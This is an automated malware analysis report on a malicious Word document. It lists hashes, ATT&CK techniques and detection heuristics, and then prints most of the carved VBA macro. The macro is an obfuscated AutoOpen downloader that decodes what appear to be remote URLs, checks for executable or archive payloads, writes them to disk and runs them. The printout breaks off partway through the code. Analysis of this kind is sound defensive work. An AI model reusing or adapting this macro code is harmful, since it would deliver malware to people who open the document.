Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 56387ffecce60cba…

MALICIOUS

Office (OLE) / .DOC

226.0 KB Created: 2023-03-21 21:41:00 Authoring application: Microsoft Office Word First seen: 2023-03-24
MD5: 22edd303f28f432bf8f89ec959819ae8 SHA-1: 3b25e29328339c5a2eef8d3140015ff47fe541c1 SHA-256: 56387ffecce60cba738357c8c265b02eeabf088449f7d2904fcadb84cba79450
172 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample contains VBA macros with an AutoOpen function, indicating it's designed to execute automatically upon opening. High-severity heuristics like OLE_VBA_CREATEOBJ and OLE_VBA_CALLBYNAME suggest the macro attempts to instantiate and interact with COM objects, likely to download and execute a secondary payload. The obfuscated script functions like mOccC and LSkiZrod further support this, as they are used to dynamically call methods and construct strings, a common technique for evading static analysis.

Heuristics 8

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set gLnpvWKt = CreateObject(tUIfxWE)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Set mOccC = CallByName(MgubWYt, EJrwYXtM, 1, DYsC)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 38502 bytes
SHA-256: 19eb5d9b904426ec7dbf7022322571315511495bc2ffa5a762bc0140e35560b8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
209 of 293 identifiers look randomly generated (e.g. 'YhXFmqopVvvHoinALwFhpfiSgzyscxqGKGJmdfLL') — consistent with name-mangling obfuscation. Carved artifact contains 8 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Function mOccC(MgubWYt As Object, QTA As String) As Object
Dim DYsC As Variant
Dim EJrwYXtM As String
Dim OATwJGd As String
Dim tvsA(14) As Long
Dim XKqjpJ As Long
XKqjpJ = 9
OATwJGd = "JmLDoJaYejiKWhQmsrNNwybHhpdRehHazcWUyeiNLdIfEaaeNP"
tvsA(0) = 19
tvsA(1) = 7
tvsA(2) = 2
tvsA(3) = 9
tvsA(4) = 17
tvsA(5) = 26
tvsA(6) = 7
tvsA(7) = 34
tvsA(8) = 9
tvsA(9) = 21
tvsA(10) = 50
tvsA(11) = 38
tvsA(12) = 21
tvsA(13) = 8
EJrwYXtM = vdQtmDhS(OATwJGd, tvsA, XKqjpJ)
DYsC = CVar(QTA)
Set mOccC = CallByName(MgubWYt, EJrwYXtM, 1, DYsC)
End Function
Sub LSkiZrod(hHLZ As String)
Dim UVQSltEy As Object
Dim NLc As String
Dim fQEetu As String
Dim mBU As String
Dim bFpxtS As String
Dim rlJkymO(20) As Long
Dim weZmQ As Long
weZmQ = 12
bFpxtS = "XortvtOxXebgyXdeHgoWiqospQEUAeJDrgbssC3eEisedWohwrxBDMiuvHWDMLCbUjTzra2rbe.mtesgWe"
rlJkymO(0) = 3
rlJkymO(1) = 10
rlJkymO(2) = 12
rlJkymO(3) = 24
rlJkymO(4) = 5
rlJkymO(5) = 3
rlJkymO(6) = 39
rlJkymO(7) = 71
rlJkymO(8) = 75
rlJkymO(9) = 10
rlJkymO(10) = 8
rlJkymO(11) = 10
rlJkymO(12) = 50
rlJkymO(13) = 49
rlJkymO(14) = 61
rlJkymO(15) = 12
rlJkymO(16) = 20
rlJkymO(17) = 56
rlJkymO(18) = 7
rlJkymO(19) = 48
mBU = vdQtmDhS(bFpxtS, rlJkymO, weZmQ)
Dim Gjivi As String
Dim ylDIOwN As String
Dim YdcaJKTa(9) As Long
Dim cyWUCI As Long
cyWUCI = 3
ylDIOwN = "OGIU/ fTLTmDss"
YdcaJKTa(0) = 5
YdcaJKTa(1) = 13
YdcaJKTa(2) = 6
YdcaJKTa(3) = 7
YdcaJKTa(4) = 2
YdcaJKTa(5) = 5
YdcaJKTa(6) = 2
YdcaJKTa(7) = 11
YdcaJKTa(8) = 6
Gjivi = vdQtmDhS(ylDIOwN, YdcaJKTa, cyWUCI)
Dim NCgM As String
Dim mEOFgqrP As String
Dim KLFqowP(5) As Long
Dim mtfjs As Long
mtfjs = 2
mEOFgqrP = "EALL\\zo"
KLFqowP(0) = 5
KLFqowP(1) = 5
KLFqowP(2) = 5
KLFqowP(3) = 7
KLFqowP(4) = 8
NCgM = vdQtmDhS(mEOFgqrP, KLFqowP, mtfjs)
fQEetu = """"
Set UVQSltEy = SRsr()
NLc = UVQSltEy.Namespace(&H25).Self.Path
NLc = NLc & NCgM
NLc = NLc & mBU
Gjivi = Gjivi & fQEetu
Gjivi = Gjivi & hHLZ
Gjivi = Gjivi & fQEetu
TrVEqYQA UVQSltEy, NLc, Gjivi
End Sub
Sub grFPk(gHPS As Object)
Dim QLBOVG As String
Dim LwgjQL As String
Dim HJlP(9) As Long
Dim KrC As Long
KrC = 4
LwgjQL = "FTKAgspysEyRjTBhPCoeossda"
HJlP(0) = 2
HJlP(1) = 8
HJlP(2) = 7
HJlP(3) = 20
HJlP(4) = 18
HJlP(5) = 21
HJlP(6) = 23
HJlP(7) = 9
HJlP(8) = 15
QLBOVG = vdQtmDhS(LwgjQL, HJlP, KrC)
CallByName gHPS, QLBOVG, 4, 1
End Sub
Sub RaeiOj(XbWGNheC As Object, MHIdGZ() As Byte)
Dim CJGPIBN As String
Dim IfzGTPZR As String
Dim hyqpqh(7) As Long
Dim oluDXhHq As Long
oluDXhHq = 5
IfzGTPZR = "XkjuIXSLvxKWnfYrEFeAGpRtTYLmkotJKFiYbQjgh"
hyqpqh(0) = 12
hyqpqh(1) = 16
hyqpqh(2) = 35
hyqpqh(3) = 24
hyqpqh(4) = 19
hyqpqh(5) = 29
hyqpqh(6) = 17
CJGPIBN = vdQtmDhS(IfzGTPZR, hyqpqh, oluDXhHq)
CallByName XbWGNheC, CJGPIBN, 1, MHIdGZ
End Sub
Function gLnpvWKt(tUIfxWE As String) As Object
Set gLnpvWKt = CreateObject(tUIfxWE)
End Function
Sub svFhBC(dlDK As Object, wQRVxqZ As String)
Dim ItRz As String
Dim nkixeaEj As String
Dim YjnV(30) As Long
Dim tZRMo As Long
tZRMo = 12
nkixeaEj = "eKAozhXuQEweoPKzJKRvUwljAYFhxujjBOnBYmRtulmZlvCYFEEeDeMatjtdrDeaeAnjeFtGweMQ"
YjnV(0) = 53
YjnV(1) = 1
YjnV(2) = 23
YjnV(3) = 1
YjnV(4) = 40
YjnV(5) = 1
YjnV(6) = 27
YjnV(7) = 4
YjnV(8) = 23
YjnV(9) = 60
YjnV(10) = 1
YjnV(11) = 61
YjnV(12) = 15
YjnV(13) = 76
YjnV(14) = 20
YjnV(15) = 66
YjnV(16) = 12
YjnV(17) = 31
YjnV(18) = 53
YjnV(19) = 24
YjnV(20) = 4
YjnV(21) = 54
YjnV(22) = 12
YjnV(23) = 51
YjnV(24) = 45
YjnV(25) = 33
YjnV(26) = 0
YjnV(27) = 7
YjnV(28) = 8
YjnV(29) = 25
ItRz = vdQtmDhS(nkixeaEj, YjnV, tZRMo)
CallByName dlDK, ItRz, 1, wQRVxqZ
End Sub
Sub YxaLeP(tCz As Object)
Dim aji As String
Dim gEupNmS As String
Dim JOni(4) As Long
Dim FYec As Long
FYec = 4
gEupNmS = "iOJnWneypipBDIfrlTtuRezgpZK"
JOni(0) = 2
JOni(1) = 9
JOni(2) = 7
JOni(3) = 4
aji = vdQtmDhS(gEupNmS, JOni, FYec)
CallByName tCz, aji, 1
End Sub
Function WJbd(JBnKDOI() As Byte) As Integer
WJbd = 0
If UBound(JBnKDOI) > 1 Then
If JBnKDOI(0) = 77 And JBnKDOI(1) = 90 Then
WJbd = 1
End If
If JBnKDOI(0) = 80 And JBnKDOI(1) = 75 Then
WJbd = 2
End If
End If
End Function
Function vntiYBA(KlA As Object) As Boolean
Dim rjVeeQHe As Long
Dim BJeZPto As String
Dim xsp As String
Dim tVzWAufP(12) As Long
Dim BWZwnA As Long
BWZwnA = 6
xsp = "vltsoWSysnuAsthtfjAQzaSUUMvuRyleFDamZogu"
tVzWAufP(0) = 7
tVzWAufP(1) = 3
tVzWAufP(2) = 22
tVzWAufP(3) = 3
tVzWAufP(4) = 11
tVzWAufP(5) = 4
tVzWAufP(6) = 9
tVzWAufP(7) = 12
tVzWAufP(8) = 4
tVzWAufP(9) = 31
tVzWAufP(10) = 17
tVzWAufP(11) = 11
BJeZPto = vdQtmDhS(xsp, tVzWAufP, BWZwnA)
rjVeeQHe = CallByName(KlA, BJeZPto, 2)
If rjVeeQHe = 200 Then
vntiYBA = True
End If
End Function
Function qisPdblM() As String
Dim FjJSWxIu As String
Dim sTTA As String
Dim UBACQd(9) As Long
Dim RCt As Long
RCt = 6
sTTA = "QtsgAMsyWhWmQmSJpjQNhBdmifK"
UBACQd(0) = 10
UBACQd(1) = 10
UBACQd(2) = 12
UBACQd(3) = 12
UBACQd(4) = 3
UBACQd(5) = 3
UBACQd(6) = 25
UBACQd(7) = 20
UBACQd(8) = 4
FjJSWxIu = vdQtmDhS(sTTA, UBACQd, RCt)
aHgmq = Now()
qisPdblM = Format(aHgmq, FjJSWxIu)
End Function
Function SRsr() As Object
Dim MUuHD As String
Dim uMXxm As String
Dim TjCD(51) As Long
Dim CIvnlNd As Long
CIvnlNd = 17
uMXxm = "upOtWGNtFJrAeKsAPeniowILRsKQJBRcltqjcOJOehUaHCbWSFeoRHfsdplGPsYXEQMoo.BcLnWiOglTgltJSpi"
TjCD(0) = 49
TjCD(1) = 42
TjCD(2) = 13
TjCD(3) = 33
TjCD(4) = 33
TjCD(5) = 70
TjCD(6) = 12
TjCD(7) = 2
TjCD(8) = 2
TjCD(9) = 33
TjCD(10) = 20
TjCD(11) = 32
TjCD(12) = 44
TjCD(13) = 4
TjCD(14) = 20
TjCD(15) = 21
TjCD(16) = 19
TjCD(17) = 75
TjCD(18) = 6
TjCD(19) = 82
TjCD(20) = 80
TjCD(21) = 69
TjCD(22) = 86
TjCD(23) = 30
TjCD(24) = 8
TjCD(25) = 76
TjCD(26) = 87
TjCD(27) = 60
TjCD(28) = 15
TjCD(29) = 38
TjCD(30) = 17
TjCD(31) = 50
TjCD(32) = 29
TjCD(33) = 1
TjCD(34) = 22
TjCD(35) = 49
TjCD(36) = 63
TjCD(37) = 86
TjCD(38) = 54
TjCD(39) = 7
TjCD(40) = 68
TjCD(41) = 77
TjCD(42) = 34
TjCD(43) = 37
TjCD(44) = 24
TjCD(45) = 46
TjCD(46) = 22
TjCD(47) = 85
TjCD(48) = 35
TjCD(49) = 59
TjCD(50) = 3
MUuHD = vdQtmDhS(uMXxm, TjCD, CIvnlNd)
Set SRsr = gLnpvWKt(MUuHD)
End Function
Sub AutoOpen()
Dim pbuDm As String
Dim lPiXpDQ As String
Dim WMWfNFL As String
Dim gKXtmE(46) As Long
Dim KkZwPYZ As Long
KkZwPYZ = 37
WMWfNFL = "plOKNBxgWNmtv/yqJSsmlwoqA/IhaTahcsljbwavsOQDgH.NsSaxoeVtJDLGTspgsp/oCgl:HYUeKBp.KbMNlOlY/evkalBaFwuCNjtdglf7dXiKZp/ibUcBftoAlmyn"
gKXtmE(0) = 28
gKXtmE(1) = 12
gKXtmE(2) = 12
gKXtmE(3) = 1
gKXtmE(4) = 72
gKXtmE(5) = 14
gKXtmE(6) = 14
gKXtmE(7) = 19
gKXtmE(8) = 23
gKXtmE(9) = 11
gKXtmE(10) = 54
gKXtmE(11) = 8
gKXtmE(12) = 104
gKXtmE(13) = 1
gKXtmE(14) = 19
gKXtmE(15) = 2
gKXtmE(16) = 23
gKXtmE(17) = 2
gKXtmE(18) = 47
gKXtmE(19) = 108
gKXtmE(20) = 11
gKXtmE(21) = 47
gKXtmE(22) = 1
gKXtmE(23) = 2
gKXtmE(24) = 14
gKXtmE(25) = 104
gKXtmE(26) = 29
gKXtmE(27) = 12
gKXtmE(28) = 29
gKXtmE(29) = 37
gKXtmE(30) = 29
gKXtmE(31) = 19
gKXtmE(32) = 54
gKXtmE(33) = 14
gKXtmE(34) = 2
gKXtmE(35) = 99
gKXtmE(36) = 14
gKXtmE(37) = 120
gKXtmE(38) = 114
gKXtmE(39) = 27
gKXtmE(40) = 81
gKXtmE(41) = 87
gKXtmE(42) = 60
gKXtmE(43) = 51
gKXtmE(44) = 2
gKXtmE(45) = 124
lPiXpDQ = vdQtmDhS(WMWfNFL, gKXtmE, KkZwPYZ)
Dim ofm As String
Dim fks As String
Dim NHAZfrd(52) As Long
Dim KHTDLmY As Long
KHTDLmY = 47
fks = "viekNLLYbxa.rtjxRJpWqmYhYmqAHNPbskcOLkYENhGeZxUpNcSuJE5SIFSgmbEIFwJpyAyaDAkphnnyAfNXAejoapcdEujFDuqPuFI:evNLJvoRTFk/mXFbkKAQTmGpXySLuhmPtowHMrAiJnMXCcYyYLHEkq5ULOeWTiBGOrYvSagtxjMWrnTvzUlbiVMSGEPEVmvWzqqnCHGBgpjEeahuoPyjUgG/zOEiFEcLqQMGW-gRSNhlbuObqteThsxVmvrbDOqQOltZEJMmbWMubOlhdGeXkfpUwGgvpfcQyZ/mGcSnVpOwnvhdlzvDqXKgDMtMSzgXCXz/T/NKyldrsYsiUtxBuGYhTxCuiAiPmOBiZahmYJbkcKdnfvZLzoLZso"
NHAZfrd(0) = 24
NHAZfrd(1) = 14
NHAZfrd(2) = 14
NHAZfrd(3) = 19
NHAZfrd(4) = 104
NHAZfrd(5) = 116
NHAZfrd(6) = 116
NHAZfrd(7) = 24
NHAZfrd(8) = 88
NHAZfrd(9) = 35
NHAZfrd(10) = 1
NHAZfrd(11) = 2
NHAZfrd(12) = 3
NHAZfrd(13) = 78
NHAZfrd(14) = 35
NHAZfrd(15) = 24
NHAZfrd(16) = 52
NHAZfrd(17) = 69
NHAZfrd(18) = 3
NHAZfrd(19) = 78
NHAZfrd(20) = 60
NHAZfrd(21) = 2
NHAZfrd(22) = 11
NHAZfrd(23) = 12
NHAZfrd(24) = 1
NHAZfrd(25) = 78
NHAZfrd(26) = 116
NHAZfrd(27) = 66
NHAZfrd(28) = 19
NHAZfrd(29) = 238
NHAZfrd(30) = 11
NHAZfrd(31) = 92
NHAZfrd(32) = 22
NHAZfrd(33) = 2
NHAZfrd(34) = 78
NHAZfrd(35) = 116
NHAZfrd(36) = 55
NHAZfrd(37) = 113
NHAZfrd(38) = 55
NHAZfrd(39) = 18
NHAZfrd(40) = 9
NHAZfrd(41) = 20
NHAZfrd(42) = 11
NHAZfrd(43) = 52
NHAZfrd(44) = 187
NHAZfrd(45) = 36
NHAZfrd(46) = 116
NHAZfrd(47) = 284
NHAZfrd(48) = 234
NHAZfrd(49) = 19
NHAZfrd(50) = 3
NHAZfrd(51) = 53
ofm = vdQtmDhS(fks, NHAZfrd, KHTDLmY)
Dim hRE As String
Dim EjuSt As String
Dim DgWpUc(120) As Long
Dim tUXIKO As Long
tUXIKO = 54
EjuSt = "dOEhHBbLRRSWnQUctlvxAfin-XIrCmfFiDBxiymXhuiVtmqDpcsqAHAMeopmjavepdVjranplTOqriwiX//MPtQnXcUaTlILwZBgsEaZh:qfmgbXdBCnHMA/hIAntvDfPhPKfnm/bVnucz8JQEqvgA.fzzxWo/wNXVmamdNqTn"
DgWpUc(0) = 4
DgWpUc(1) = 17
DgWpUc(2) = 17
DgWpUc(3) = 49
DgWpUc(4) = 51
DgWpUc(5) = 106
DgWpUc(6) = 82
DgWpUc(7) = 82
DgWpUc(8) = 51
DgWpUc(9) = 62
DgWpUc(10) = 16
DgWpUc(11) = 4
DgWpUc(12) = 23
DgWpUc(13) = 13
DgWpUc(14) = 23
DgWpUc(15) = 13
DgWpUc(16) = 17
DgWpUc(17) = 57
DgWpUc(18) = 28
DgWpUc(19) = 13
DgWpUc(20) = 62
DgWpUc(21) = 17
DgWpUc(22) = 23
DgWpUc(23) = 58
DgWpUc(24) = 13
DgWpUc(25) = 62
DgWpUc(26) = 18
DgWpUc(27) = 151
DgWpUc(28) = 16
DgWpUc(29) = 58
DgWpUc(30) = 30
DgWpUc(31) = 82
DgWpUc(32) = 79
DgWpUc(33) = 49
DgWpUc(34) = 25
DgWpUc(35) = 62
DgWpUc(36) = 1
DgWpUc(37) = 30
DgWpUc(38) = 23
DgWpUc(39) = 13
DgWpUc(40) = 82
DgWpUc(41) = 27
DgWpUc(42) = 8
DgWpUc(43) = 44
DgWpUc(44) = 34
DgWpUc(45) = 13
DgWpUc(46) = 18
DgWpUc(47) = 30
DgWpUc(48) = 27
DgWpUc(49) = 21
DgWpUc(50) = 74
DgWpUc(51) = 7
DgWpUc(52) = 143
DgWpUc(53) = 82
DgWpUc(54) = 121
DgWpUc(55) = 59
DgWpUc(56) = 75
DgWpUc(57) = 12
DgWpUc(58) = 60
DgWpUc(59) = 21
DgWpUc(60) = 131
DgWpUc(61) = 143
DgWpUc(62) = 14
DgWpUc(63) = 31
DgWpUc(64) = 54
DgWpUc(65) = 124
DgWpUc(66) = 49
DgWpUc(67) = 133
DgWpUc(68) = 101
DgWpUc(69) = 2
DgWpUc(70) = 50
DgWpUc(71) = 39
DgWpUc(72) = 100
DgWpUc(73) = 60
DgWpUc(74) = 155
DgWpUc(75) = 119
DgWpUc(76) = 15
DgWpUc(77) = 85
DgWpUc(78) = 118
DgWpUc(79) = 42
DgWpUc(80) = 111
DgWpUc(81) = 11
DgWpUc(82) = 79
DgWpUc(83) = 153
DgWpUc(84) = 20
DgWpUc(85) = 143
DgWpUc(86) = 137
DgWpUc(87) = 52
DgWpUc(88) = 161
DgWpUc(89) = 152
DgWpUc(90) = 153
DgWpUc(91) = 140
DgWpUc(92) = 153
DgWpUc(93) = 118
DgWpUc(94) = 13
DgWpUc(95) = 19
DgWpUc(96) = 84
DgWpUc(97) = 64
DgWpUc(98) = 55
DgWpUc(99) = 75
DgWpUc(100) = 129
DgWpUc(101) = 70
DgWpUc(102) = 120
DgWpUc(103) = 128
DgWpUc(104) = 115
DgWpUc(105) = 32
DgWpUc(106) = 33
DgWpUc(107) = 111
DgWpUc(108) = 37
DgWpUc(109) = 84
DgWpUc(110) = 150
DgWpUc(111) = 61
DgWpUc(112) = 36
DgWpUc(113) = 22
DgWpUc(114) = 146
DgWpUc(115) = 121
DgWpUc(116) = 64
DgWpUc(117) = 116
DgWpUc(118) = 39
DgWpUc(119) = 131
hRE = vdQtmDhS(EjuSt, DgWpUc, tUXIKO)
Dim nPzUOl As String
Dim PtEc As String
Dim cazvCMU(83) As Long
Dim YgkCm As Long
YgkCm = 45
PtEc = "aFdwCoxPfLaQgMMtOGOjqhRuSiYnvwnGnTTMwJCCEvziDqjilLwfSTA8nSUBspQKpSr/YdLRgUlzsyGRbbidZotcFJQLqwJoqYsDLZKcXgYBh/egyswZyGPgagfMAMXBs/oSNmgvm-XektmeIdg0Bggwc/euAJHfLhBLYghpWctmSRzMM:KTvKUoacyqUXDQpJpkRrNpWcmFZbkjROossd/QzwfcQxfluIOiruDjZLKBOmWSTgnKIVAWm.boOQjFYQtuWtkUHdEdLnfZYzjrrtRLVcMaFpeRVAbQofNUuegRsdBIgjNQdDOiyeSunIosYWtOaGKJpYFbDZtUozfjMYHpIPeq"
cazvCMU(0) = 22
cazvCMU(1) = 16
cazvCMU(2) = 16
cazvCMU(3) = 62
cazvCMU(4) = 178
cazvCMU(5) = 68
cazvCMU(6) = 68
cazvCMU(7) = 13
cazvCMU(8) = 3
cazvCMU(9) = 88
cazvCMU(10) = 13
cazvCMU(11) = 67
cazvCMU(12) = 6
cazvCMU(13) = 24
cazvCMU(14) = 62
cazvCMU(15) = 250
cazvCMU(16) = 29
cazvCMU(17) = 28
cazvCMU(18) = 68
cazvCMU(19) = 4
cazvCMU(20) = 62
cazvCMU(21) = 138
cazvCMU(22) = 1
cazvCMU(23) = 3
cazvCMU(24) = 134
cazvCMU(25) = 26
cazvCMU(26) = 28
cazvCMU(27) = 68
cazvCMU(28) = 148
cazvCMU(29) = 26
cazvCMU(30) = 62
cazvCMU(31) = 169
cazvCMU(32) = 14
cazvCMU(33) = 12
cazvCMU(34) = 27
cazvCMU(35) = 13
cazvCMU(36) = 13
cazvCMU(37) = 10
cazvCMU(38) = 17
cazvCMU(39) = 45
cazvCMU(40) = 56
cazvCMU(41) = 169
cazvCMU(42) = 1
cazvCMU(43) = 9
cazvCMU(44) = 68
cazvCMU(45) = 155
cazvCMU(46) = 311
cazvCMU(47) = 226
cazvCMU(48) = 69
cazvCMU(49) = 39
cazvCMU(50) = 198
cazvCMU(51) = 111
cazvCMU(52) = 183
cazvCMU(53) = 235
cazvCMU(54) = 301
cazvCMU(55) = 307
cazvCMU(56) = 135
cazvCMU(57) = 47
cazvCMU(58) = 22
cazvCMU(59) = 95
cazvCMU(60) = 154
cazvCMU(61) = 44
cazvCMU(62) = 74
cazvCMU(63) = 181
cazvCMU(64) = 145
cazvCMU(65) = 54
cazvCMU(66) = 273
cazvCMU(67) = 153
cazvCMU(68) = 96
cazvCMU(69) = 140
cazvCMU(70) = 302
cazvCMU(71) = 121
cazvCMU(72) = 21
cazvCMU(73) = 310
cazvCMU(74) = 97
cazvCMU(75) = 222
cazvCMU(76) = 18
cazvCMU(77) = 258
cazvCMU(78) = 58
cazvCMU(79) = 225
cazvCMU(80) = 235
cazvCMU(81) = 21
cazvCMU(82) = 346
nPzUOl = vdQtmDhS(PtEc, cazvCMU, YgkCm)
Dim ADpfMk As String
Dim mRI As String
Dim Efh(120) As Long
Dim rwelg As Long
rwelg = 57
mRI = ".lxeTiEdXaQXmexvP/lx3tSOmcu.09at/WEBuKwufMRiAEEvohENFkFwLm/PhcueGPkyvqpsyfUJNblwwL4LraO:NibptoiSWkMvm6HtbGxlxXmsjdD/mOpMKtWdSf6lGnKUA-EsPJRpsKHeAcnsuWTTBu/rPgRfjcMktnmVIpZPGx0etQnocMj"
Efh(0) = 50
Efh(1) = 22
Efh(2) = 22
Efh(3) = 71
Efh(4) = 72
Efh(5) = 88
Efh(6) = 18
Efh(7) = 18
Efh(8) = 72
Efh(9) = 27
Efh(10) = 71
Efh(11) = 71
Efh(12) = 2
Efh(13) = 6
Efh(14) = 4
Efh(15) = 85
Efh(16) = 26
Efh(17) = 6
Efh(18) = 22
Efh(19) = 68
Efh(20) = 1
Efh(21) = 26
Efh(22) = 49
Efh(23) = 13
Efh(24) = 1
Efh(25) = 13
Efh(26) = 3
Efh(27) = 18
Efh(28) = 39
Efh(29) = 71
Efh(30) = 134
Efh(31) = 26
Efh(32) = 49
Efh(33) = 130
Efh(34) = 22
Efh(35) = 4
Efh(36) = 130
Efh(37) = 22
Efh(38) = 18
Efh(39) = 3
Efh(40) = 29
Efh(41) = 27
Efh(42) = 102
Efh(43) = 39
Efh(44) = 23
Efh(45) = 5
Efh(46) = 29
Efh(47) = 21
Efh(48) = 68
Efh(49) = 102
Efh(50) = 9
Efh(51) = 83
Efh(52) = 30
Efh(53) = 42
Efh(54) = 24
Efh(55) = 70
Efh(56) = 18
Efh(57) = 183
Efh(58) = 54
Efh(59) = 6
Efh(60) = 21
Efh(61) = 70
Efh(62) = 20
Efh(63) = 143
Efh(64) = 70
Efh(65) = 86
Efh(66) = 93
Efh(67) = 163
Efh(68) = 105
Efh(69) = 181
Efh(70) = 62
Efh(71) = 27
Efh(72) = 37
Efh(73) = 45
Efh(74) = 79
Efh(75) = 141
Efh(76) = 160
Efh(77) = 68
Efh(78) = 112
Efh(79) = 76
Efh(80) = 116
Efh(81) = 98
Efh(82) = 165
Efh(83) = 179
Efh(84) = 14
Efh(85) = 85
Efh(86) = 161
Efh(87) = 45
Efh(88) = 117
Efh(89) = 173
Efh(90) = 172
Efh(91) = 70
Efh(92) = 162
Efh(93) = 175
Efh(94) = 96
Efh(95) = 183
Efh(96) = 113
Efh(97) = 114
Efh(98) = 168
Efh(99) = 44
Efh(100) = 149
Efh(101) = 175
Efh(102) = 103
Efh(103) = 87
Efh(104) = 62
Efh(105) = 98
Efh(106) = 12
Efh(107) = 176
Efh(108) = 139
Efh(109) = 144
Efh(110) = 150
Efh(111) = 24
Efh(112) = 165
Efh(113) = 171
Efh(114) = 106
Efh(115) = 110
Efh(116) = 56
Efh(117) = 173
Efh(118) = 91
Efh(119) = 148
ADpfMk = vdQtmDhS(mRI, Efh, rwelg)
Dim VCnnlh As String
Dim kAGc As String
Dim oufpPqh(95) As Long
Dim SFHHwIF As Long
SFHHwIF = 37
kAGc = "XIcMAayzyQtezgWv/Yfto//GKySFEalPOXkQgwFghlNligezErrMWrjQUaRmNRzdexOLSumkNbMYTyXg.kwztgPfni:unxgRfMp.PutzQ/yUiSvut/dRuyhNdKgnrbaCdZBoF"
oufpPqh(0) = 41
oufpPqh(1) = 11
oufpPqh(2) = 11
oufpPqh(3) = 99
oufpPqh(4) = 91
oufpPqh(5) = 17
oufpPqh(6) = 17
oufpPqh(7) = 64
oufpPqh(8) = 6
oufpPqh(9) = 50
oufpPqh(10) = 74
oufpPqh(11) = 6
oufpPqh(12) = 8
oufpPqh(13) = 45
oufpPqh(14) = 81
oufpPqh(15) = 21
oufpPqh(16) = 50
oufpPqh(17) = 14
oufpPqh(18) = 81
oufpPqh(19) = 14
oufpPqh(20) = 12
oufpPqh(21) = 17
oufpPqh(22) = 31
oufpPqh(23) = 6
oufpPqh(24) = 89
oufpPqh(25) = 14
oufpPqh(26) = 70
oufpPqh(27) = 6
oufpPqh(28) = 14
oufpPqh(29) = 12
oufpPqh(30) = 17
oufpPqh(31) = 45
oufpPqh(32) = 7
oufpPqh(33) = 10
oufpPqh(34) = 4
oufpPqh(35) = 41
oufpPqh(36) = 17
oufpPqh(37) = 19
oufpPqh(38) = 65
oufpPqh(39) = 21
oufpPqh(40) = 48
oufpPqh(41) = 125
oufpPqh(42) = 87
oufpPqh(43) = 74
oufpPqh(44) = 49
oufpPqh(45) = 87
oufpPqh(46) = 124
oufpPqh(47) = 51
oufpPqh(48) = 46
oufpPqh(49) = 59
oufpPqh(50) = 113
oufpPqh(51) = 59
oufpPqh(52) = 6
oufpPqh(53) = 40
oufpPqh(54) = 53
oufpPqh(55) = 45
oufpPqh(56) = 41
oufpPqh(57) = 30
oufpPqh(58) = 16
oufpPqh(59) = 106
oufpPqh(60) = 89
oufpPqh(61) = 60
oufpPqh(62) = 66
oufpPqh(63) = 73
oufpPqh(64) = 89
oufpPqh(65) = 86
oufpPqh(66) = 65
oufpPqh(67) = 41
oufpPqh(68) = 18
oufpPqh(69) = 89
oufpPqh(70) = 8
oufpPqh(71) = 21
oufpPqh(72) = 50
oufpPqh(73) = 132
oufpPqh(74) = 101
oufpPqh(75) = 14
oufpPqh(76) = 33
oufpPqh(77) = 30
oufpPqh(78) = 130
oufpPqh(79) = 65
oufpPqh(80) = 42
oufpPqh(81) = 82
oufpPqh(82) = 3
oufpPqh(83) = 18
oufpPqh(84) = 82
oufpPqh(85) = 54
oufpPqh(86) = 90
oufpPqh(87) = 48
oufpPqh(88) = 101
oufpPqh(89) = 49
oufpPqh(90) = 20
oufpPqh(91) = 49
oufpPqh(92) = 99
oufpPqh(93) = 85
oufpPqh(94) = 74
VCnnlh = vdQtmDhS(kAGc, oufpPqh, SFHHwIF)
Dim vajUdNG As String
Dim AaShHs As String
Dim oPShajm(63) As Long
Dim ZGGnRhG As Long
ZGGnRhG = 40
AaShHs = "NtGzcFLgPLUTQHqqREVHdrSQRdzyhLivyucrijHS/IyYHQUBYnOKgIAoFrwGkK:BibeRkrrQxIGUbSmFWVigXaDeovqkteOYnIKicxweCS/aYatYxOxbrnvenhbX/fODItdfESrZOSMabxHuRVsdm.DUubfvtqkRCsHaLOWCgpgwgKfLbarHzWRKddSzxmf/iKrTciNDAoVaFNHNpAdLd/iCcyMjflieeniwYHheLaeDnTWXSXvVTNLMRIdiGPHsPYmQwXDIIj8jYFemZMWPqZBxnLpzOCf"
oPShajm(0) = 29
oPShajm(1) = 2
oPShajm(2) = 2
